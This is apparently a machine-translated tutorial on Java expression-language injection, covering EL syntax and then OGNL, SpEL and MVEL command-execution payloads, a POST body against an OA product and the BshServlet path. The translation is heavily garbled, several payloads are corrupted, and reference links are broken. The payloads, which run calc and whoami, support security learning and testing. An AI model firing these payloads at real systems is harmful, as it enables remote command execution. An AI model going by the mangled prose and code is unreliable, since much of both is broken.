Java table expression injection


Java middle table expression type root setting frame division, among which EL table expression expression jsp-like introductory word sound, approval completion jsp transcription and renewal, its design idea origin self ʻECMAScriptsumXPath. Use EL table expression type I can use jsp 页 surface middle 执 line calculation, data number setting, adjustment method, object object operation, etc. Its basic grammar $ {variation table expression}`.

Basic grammar

Most of the grammar is Towa jsp.

获tori change amount

<%@ page import="java.util.HashMap" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
    String name = "Kozo";

    request.setAttribute("request", "request_name");
    session.setAttribute("session", "session_name");
    pageContext.setAttribute("page", "page_name");
    application.setAttribute("application", "application_name");
    HashMap<String, String> map = new HashMap<>();
    map.put("my-name", "admin");
    request.setAttribute("test", map);
Amount of search engine in the four working areas:${name}
<%--Scope of action--%>
来 requestScope Working area medium 获 removal amount:${requestScope.request}
来sessionScope Scope of action${sessionScope.session}
来 pageScope Scope of action Medium 获 removal amount:${}
来 applicationScope Area of action${applicationScope.application}
Scope of action Special code change amount:${requestScope.test["my-name"]}

Operation mark

Type Code
Arithmetic type +、-(Binary),*、/、div、%、mod、-(Unified)
Logic type and、&&, Or, double tube sign,!、not
Related type ==、eq、!=、ne、<、lt、>、gt、<=、le、>=, Ge. Can give and other 值 advance comparison, or give type, character skewer type, fixed type or floating point type character advance comparison.
Sky empty Empty operation Prefix operation, available and undecided.
Conditional type A ?B :C. Rooting A 赋值 -like result coming 赋值 B or C.


  1. pageContext
  2. param paramValues
  3. header headerValues
  4. cookie
  5. initParam
  6. Scope series


${ns:func(param1, param2, ...)}

For el table expression expression function required use taglib entry-like standard

Java method for preparation

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@taglib prefix="elFunc" uri="" %>
    String name = "Kozo";
Function for adjustment:${elFunc:elFunc(name)}

Export adjustment function: hello 张 3

Forbidden / Forbidden EL table expression ceremony

EL table forbidden to all stations, web.xml


Forbidden EL table expression ceremony In the JSP text, you can do it.

<%@ page isELIgnored="true" %>

EL table expression for prohibiting display of words, TRUE display prohibited, FALSE display prohibited.

JSP2.0 EL table expression for medium-sized swords.

Table-type injection leak example

Principle Miyako Seiichi Sample: All table expressions or external copy. A proof-of-concept poc in the front row, and a proof-of-concept proof of a set.

Common POC


Struts2 OGNL

@[All names (comprehensive path diameter)]@[Method name|Name], Example:
​@java.lang.String@format('foo %s', 'bar')


ActionContext AC = ActionContext.getContext();
String expression = "${(new java.lang.ProcessBuilder('calc')).start()}";

Spring SPEL

String expression = "T(java.lang.Runtime).getRuntime().exec(/"calc/")";
String result = parser.parseExpression(expression).getValue().toString();


<spring:message text="${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">

Elasticsearch MVEL

String expression = "new java.lang.ProcessBuilder(/"calc/").start();";  
​Boolean result = (Boolean) MVEL.eval(expression, vars);

Minoru OA EL table-type injection

[email protected]@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())

Someone POST

message=(#[email protected]@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print([0]).getInputStream()))).(#w.close())&cmd=whoami

One kind of reduction

POST /weaver/bsh.servlet.BshServlet

The bottom

  1. Reflection
  2. unicode
  3. Octal system


  1. [Injection of fine e-mobile ognl]( A8% E5% 85%
  4. [Appearance type injection]( % A5 /)

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